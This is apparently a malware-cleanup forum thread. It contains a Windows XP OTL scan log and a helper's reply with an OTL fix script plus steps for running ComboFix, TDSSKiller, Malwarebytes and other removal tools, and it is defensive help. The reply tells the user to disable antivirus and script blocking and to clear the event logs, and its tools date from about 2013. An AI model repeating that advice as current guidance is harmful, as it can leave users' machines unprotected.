O16 - DPF: {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_05)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_07)
O16 - DPF: {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.m...ash/swflash.cab (Shockwave Flash Object)
O16 - DPF: {EFD3EA56-234D-4240-90EA-CC9FA3AF5A01} https://care.windstr...TELControls.cab (ConnectivityTester Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{4B8689F4-82D6-40F3-A1C1-1A5487DCE17D}: DhcpNameServer = 192.168.1.1
O18 - Protocol\Handler\cetihpz {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll (Hewlett-Packard Company)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - HKCU Winlogon: Shell - (EXPLORER.EXE) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\avgrsstarter: DllName - (avgrsstx.dll) - File not found
O20 - Winlogon\Notify\igfxcui: DllName - (igfxsrvc.dll) - C:\WINDOWS\System32\igfxsrvc.dll (Intel Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Owner\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2004/05/12 00:25:35 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O32 - AutoRun File - [2001/07/28 05:07:38 | 000,000,000 | -HS- | M] () - D:\AUTOEXEC.BAT -- [ FAT32 ]
O32 - AutoRun File - [2002/09/11 02:02:32 | 000,000,045 | -HS- | M] () - D:\Autorun.inf -- [ FAT32 ]
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\AutoRun\command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell00\Command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell01\Command - "" = M:\Autorun.exe /action
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell02\Command - "" = M:\Autorun.exe /uninstall
O33 - MountPoints2\D\Shell\AutoRun\command - "" = D:\Info.exe -- [2002/09/10 20:54:58 | 000,040,960 | -HS- | M] (XSS)
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O36 - AppCertDlls: Filedstr - (C:\WINDOWS\system32\dfrgeset.dll) - File not found
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

========== Files/Folders - Created Within 30 Days ==========

[2013/01/17 11:28:28 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Owner\Recent
[2013/01/15 20:33:34 | 000,000,000 | ---D | C] -- C:\TDSSKiller_Quarantine
[2013/01/14 19:26:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\avast! Free Antivirus
[2013/01/14 19:26:18 | 000,021,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2013/01/14 19:26:17 | 000,361,032 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2013/01/14 19:25:48 | 000,035,928 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2013/01/14 19:25:47 | 000,054,232 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2013/01/14 19:25:43 | 000,738,504 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSnx.sys
[2013/01/14 19:25:41 | 000,097,608 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2013/01/14 19:25:41 | 000,089,752 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2013/01/14 19:25:39 | 000,025,256 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2013/01/14 19:23:24 | 000,041,224 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2013/01/14 19:23:23 | 000,227,648 | ---- | C] (AVAST Software) -- C:\WINDOWS\System32\aswBoot.exe
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2013/01/14 19:21:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2013/01/14 14:23:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\Google Chrome
[2013/01/14 14:12:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Owner\Application Data\SUPERAntiSpyware.com
[2013/01/14 14:11:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Start Menu\Programs\SUPERAntiSpyware
[2013/01/10 21:14:52 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\Documents and Settings\Owner\My Documents\*.tmp files -> C:\Documents and Settings\Owner\My Documents\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/01/17 15:55:12 | 000,000,362 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/17 15:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At41.job
[2013/01/17 15:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At24.job
[2013/01/17 15:17:00 | 000,000,886 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2013/01/17 14:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At39.job
[2013/01/17 14:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At14.job
[2013/01/17 14:17:00 | 000,000,882 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2013/01/17 13:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At36.job
[2013/01/17 13:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At22.job
[2013/01/17 12:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At37.job
[2013/01/17 12:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At20.job
[2013/01/17 11:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At38.job
[2013/01/17 11:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At16.job
[2013/01/17 10:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At34.job
[2013/01/17 10:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At11.job
[2013/01/17 09:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At33.job
[2013/01/17 09:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At10.job
[2013/01/17 08:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At35.job
[2013/01/17 08:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At9.job
[2013/01/17 07:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At32.job
[2013/01/17 07:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At8.job
[2013/01/17 06:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At31.job
[2013/01/17 06:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At7.job
[2013/01/17 06:02:50 | 000,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2013/01/17 06:00:15 | 000,000,187 | ---- | M] () -- C:\WINDOWS\System\hpsysdrv.DAT
[2013/01/17 05:59:55 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2013/01/16 20:21:48 | 527,814,656 | -HS- | M] () -- C:\hiberfil.sys
[2013/01/16 19:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At46.job
[2013/01/16 19:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At17.job
[2013/01/16 18:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At42.job
[2013/01/16 18:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At13.job
[2013/01/16 17:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At40.job
[2013/01/16 17:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At15.job
[2013/01/16 16:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At44.job
[2013/01/16 16:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At23.job
[2013/01/15 20:46:15 | 000,000,795 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
[2013/01/15 06:30:30 | 000,001,842 | ---- | M] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/15 05:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At30.job
[2013/01/15 05:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At5.job
[2013/01/15 04:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At26.job
[2013/01/15 04:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At4.job
[2013/01/15 03:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At29.job
[2013/01/15 03:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At3.job
[2013/01/15 02:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At27.job
[2013/01/15 02:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At1.job
[2013/01/15 01:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At28.job
[2013/01/15 01:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At2.job
[2013/01/15 00:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At25.job
[2013/01/15 00:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At6.job
[2013/01/14 23:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At45.job
[2013/01/14 23:32:00 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At18.job
[2013/01/14 22:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At43.job
[2013/01/14 22:32:01 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At12.job
[2013/01/14 21:48:00 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At48.job
[2013/01/14 21:32:02 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At19.job
[2013/01/14 20:48:07 | 000,000,404 | ---- | M] () -- C:\WINDOWS\tasks\At47.job
[2013/01/14 20:32:06 | 000,000,402 | ---- | M] () -- C:\WINDOWS\tasks\At21.job
[2013/01/14 19:26:20 | 000,001,700 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:43 | 000,002,625 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2013/01/14 14:23:04 | 000,001,824 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2013/01/10 03:19:17 | 000,472,854 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2013/01/10 03:19:17 | 000,079,394 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2012/12/21 03:18:57 | 000,186,608 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\Documents and Settings\Owner\My Documents\*.tmp files -> C:\Documents and Settings\Owner\My Documents\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/01/16 06:09:36 | 527,814,656 | -HS- | C] () -- C:\hiberfil.sys
[2013/01/14 19:26:20 | 000,001,700 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\avast! Free Antivirus.lnk
[2013/01/14 19:25:47 | 000,000,362 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/01/14 14:23:04 | 000,001,842 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2013/01/14 14:23:03 | 000,001,824 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/01/14 14:11:21 | 000,001,689 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk
[2012/02/15 01:03:58 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll
[2011/12/21 10:45:18 | 000,000,000 | ---- | C] () -- C:\WINDOWS\SETUP32.INI
[2011/10/19 20:54:03 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat
[2011/10/19 20:54:03 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat
[2011/10/19 16:12:36 | 000,103,511 | ---- | C] () -- C:\WINDOWS\hpoins04.dat.temp
[2011/10/19 16:12:36 | 000,017,176 | ---- | C] () -- C:\WINDOWS\hpomdl04.dat.temp
[2010/10/22 18:49:43 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\prvlcl.dat
[2009/02/08 15:19:00 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\Ÿ9Ÿ9
[2008/07/06 09:57:36 | 000,004,630 | ---- | C] () -- C:\Documents and Settings\Owner\r
[2008/05/25 13:48:56 | 000,000,041 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\.zreglib
[2008/04/30 08:57:22 | 000,000,310 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\APUSet.xml
[2008/04/30 08:57:21 | 000,006,467 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\PrimoPDFSet.xml
[2008/03/28 09:05:33 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Owner\USB
[2007/12/23 06:30:34 | 000,000,374 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb6334.dat
[2007/12/23 06:30:25 | 000,000,555 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb8467.dat
[2007/12/23 06:30:24 | 000,018,432 | ---- | C] () -- C:\Documents and Settings\Owner\Application Data\internaldb41.dat
[2007/11/21 15:58:51 | 000,007,680 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2004/05/12 06:23:18 | 000,000,128 | ---- | C] () -- C:\Documents and Settings\Owner\Local Settings\Application Data\fusioncache.dat
[2004/05/12 00:44:45 | 000,015,619 | ---- | C] () -- C:\Documents and Settings\Owner\ml1.srt
[2004/05/12 00:44:45 | 000,015,420 | ---- | C] () -- C:\Documents and Settings\Owner\ml2.srt

========== ZeroAccess Check ==========

[2004/05/12 01:11:21 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\System32\shdocvw.dll -- [2008/04/13 18:12:05 | 001,499,136 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = C:\WINDOWS\System32\wbem\fastprox.dll -- [2009/02/09 06:10:48 | 000,473,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = C:\WINDOWS\System32\wbem\wbemess.dll -- [2008/04/13 18:12:08 | 000,273,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

========== LOP Check ==========

[2013/01/14 19:21:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\AVAST Software
[2010/12/20 18:05:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\AVG10
[2010/10/17 08:56:36 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\avg9
[2008/06/12 21:40:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Azureus
[2010/10/17 00:42:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Common Files
[2008/05/25 12:44:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\DAEMON Tools Pro
[2010/11/26 02:18:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\dJcLj03100
[2008/02/28 16:24:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IM
[2008/02/28 16:23:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\IncrediMail
[2010/12/30 09:14:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\iNlGh06101
[2013/01/13 21:31:29 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\InstallMate
[2010/10/17 08:23:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\MFAData
[2008/07/25 15:07:35 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Napster
[2012/03/04 18:57:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Premium
[2007/10/15 05:55:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Recisio
[2010/02/13 17:31:21 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Temp
[2010/11/25 20:18:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WSTB
[2008/12/19 17:57:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
[2010/10/17 10:06:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\AVG10
[2010/12/04 18:22:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Azureus
[2007/10/20 13:53:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Ceedo
[2010/11/25 19:10:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Ciiza
[2012/12/04 18:47:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Common Files
[2008/05/25 12:50:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools
[2008/05/25 12:41:55 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DAEMON Tools Pro
[2011/12/20 09:27:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DDMSettings
[2008/09/17 19:14:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\DNA
[2010/11/25 20:18:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Idew
[2007/10/15 07:03:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterMute
[2008/08/03 16:02:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\InterVideo
[2008/04/17 12:02:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Leadertech
[2008/04/20 21:06:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MagicEffect Photo
[2008/02/08 15:39:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\MSNInstaller
[2010/11/13 08:37:49 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\PrimoPDF
[2010/05/01 14:54:25 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Safer Networking
[2004/05/12 06:05:09 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\SampleView
[2009/02/09 23:37:02 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\Template
[2010/12/22 19:11:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Owner\Application Data\WinPatrol

========== Purity Check ==========



< End of report >

#2
RKinner

    Malware Expert

  • Expert
  • 24,624 posts
  • MVP
Copy the text in the code box by highlighting and Ctrl + c


:OTL
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
O3 - HKLM\..\Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No CLSID value found.
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...t/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_03)
O16 - DPF: {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_05)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_07)
O16 - DPF: {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O32 - AutoRun File - [2001/07/28 05:07:38 | 000,000,000 | -HS- | M] () - D:\AUTOEXEC.BAT -- [ FAT32 ]
O32 - AutoRun File - [2002/09/11 02:02:32 | 000,000,045 | -HS- | M] () - D:\Autorun.inf -- [ FAT32 ]
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\AutoRun\command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell00\Command - "" = M:\Autorun.exe /run
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell01\Command - "" = M:\Autorun.exe /action
O33 - MountPoints2\{d4b40609-7f44-11dc-a96c-00112f472345}\Shell\Shell02\Command - "" = M:\Autorun.exe /uninstall
O33 - MountPoints2\D\Shell\AutoRun\command - "" = D:\Info.exe -- [2002/09/10 20:54:58 | 000,040,960 | -HS- | M] (XSS) = E:\LaunchU3.exe -a

:files
at /c
C:\WINDOWS\tasks\At*.job

:Commands
[EMPTYFLASH]
[EMPTYJAVA]
[purity]
[Reboot]


Then double-click on OTL to start. Under the Custom Scans/Fixes box at the bottom, paste (Ctrl + v) the text. Verify that you got it all and then click the RUN FIX button (NOT THE QUICK SCAN button!) at the top.
Let the program run unhindered; OTL will reboot the PC when it is done. Save the log and copy and paste it into a reply.

Download Flash_Disinfector.exe by sUBs
http://download.blee...Disinfector.exe
and save it to your desktop.

* Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
* The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
* Wait until it has finished scanning and then exit the program.
* Reboot your computer when done.


Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.



Download aswMBR.exe to your desktop.
Double click aswMBR.exe
Uncheck trace disk IO calls.
Click the "Scan" button to start the scan (accept the Avast Engine).
On completion of the scan, if the Fix button is enabled (not the FixMBR button), press it and then run a new scan and click save log, save it to your desktop and post it in your next reply.
If the Fix button is not enabled, then just click save log, save it to your desktop and post it in your next reply.

ComboFix

It must be saved to your desktop, do not run it from your browser.

Disable your Antivirus software when downloading or running Combofix. If it has Script Blocking features, please disable these as well. See: http://www.bleepingc...opic114351.html


Download and Save this file -- to your Desktop -- from either of these two sources:
http://download.blee...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Double click on ComboFix to start the program.



* Important: Have no other programs running. Your Task Bar should be clear of any program entries including your Browser.


* A window may open with a series of Disclaimers. Accept the Disclaimers to start the fix.

A caution - Do not run Combofix more than once. Do not touch your mouse/keyboard until the scan has completed, as this may cause the process to stall or your computer to lock. The scan will temporarily disable your desktop, and if interrupted may leave your desktop disabled. If this occurs, please reboot to restore the desktop. Even when ComboFix appears to be doing nothing, look at your Drive light. If it is flashing, Combofix is still at work.

A file will be created at => C:\Combofix.txt. I'll need to see that in your reply.


Download TDSSKiller:
http://support.kaspe.../tdsskiller.exe
Save it to your desktop then run it.
Double click on TDSSKiller.exe to start the program.

If TDSSKiller alerts you that the system needs to reboot, please consent.

Run TDSSKiller again but this time:
Before you hit Scan, hit Change Parameters and check the two items under Additional Options. OK, then Scan.
In this mode it is prone to false positives so do not change the SKIP option to DELETE unless it says TDSS.
When done, a log file should be created on your C: drive named "TDSSKiller.txt" please copy and paste the contents in your next reply.



Malwarebytes' Anti-Malware
If you have a previous version of MalwareBytes', remove it via Add or Remove Programs and download a fresh copy.
http://www.malwareby...lwarebytes_free

SAVE Malwarebytes' Anti-Malware to your desktop.

* Double-click mbam-setup.exe to start the program.
* Follow the prompts to install the program.
* At the end, be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select Perform quick scan, then click Scan.
* When the scan is complete, click OK, then Show Results to view the results.

* Be sure that everything is checked, and click Remove Selected.

* When completed, a log will open in Notepad. Please save it to a convenient location.
* The log can also be found here:
C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
* Post that log back here.


Right click on (My) Computer and select Manage (Continue), then the Event Viewer. Next select Windows Logs. Right click on System and Clear Log, Clear. Repeat for Application.

Reboot.

1. Please download the Event Viewer Tool by Vino Rosso
http://images.malwar...om/vino/VEW.exe
and save it to your Desktop:
2. Double-click VEW.exe
3. Under 'Select log to query', select:

* System
4. Under 'Select type to list', select:
* Error
* Warning


Then use the 'Number of events' as follows:


1. Click the radio button for 'Number of events'
Type 20 in the 1 to 20 box
Then click the Run button.
Notepad will open with the output log.


Please post the Output log in your next reply then repeat but select Application.


Copy the text in the code box:

DRIVES
nnetsvcs
%SYSTEMDRIVE%\*.exe
%systemroot%\assembly\GAC_32\*.ini
%systemroot%\assembly\GAC_64\*.ini
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%SYSTEMDRIVE%\*.exe
%ALLUSERSPROFILE%\Application Data\*.exe
%APPDATA%\*.
/md5start
pnrpnsp.dll 
nwprovau.dll
nlaapi.dll
napinsp.dll
mswsock.dll
winrnr.dll
wshelper.dll
services.exe
atapi.sys
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
csrss.exe
PrintIsolationHost.exe
consrv.dll
/md5stop
%systemroot%\*. /mp /s
